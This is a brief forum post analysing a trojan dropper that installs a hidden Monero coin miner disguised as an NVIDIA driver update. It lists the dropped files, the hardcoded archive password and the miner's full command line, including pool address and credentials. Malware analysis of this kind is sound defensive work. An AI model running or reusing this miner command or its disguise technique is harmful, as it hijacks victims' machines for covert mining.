 #32408  by EP_X0FF
 Wed Jan 09, 2019 9:38 am
https://www.virustotal.com/en/file/ca2e ... 483276621/
Trojan muldrop with coin miner as payload.

SFX archive, next actual malware dropper -> extracts files to %UserProfile%\Public. Main malware inside password protected zip file called dokinz.zip. This zip file unpacked by ConsoleApplication1.exe (also dropped by malware) with password "dokinzakbar" (hardcoded inside ConsoleApplication1.exe). After unpacking ConsoleApplication1.exe executes malicious script NVidiaDriverUpdate.vbs

TL;DR it is cryptocurrency miner configured as
Code: Select all
"NvidiaUpdater.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u kso-magnitka@yandex.ru -p 2101skymagicss -t 1", 0, true
where NvidiaUpdater.exe is a coin miner called "cpuminer-multi".

This email can be found in google and lead to russian Magnitogorsk.

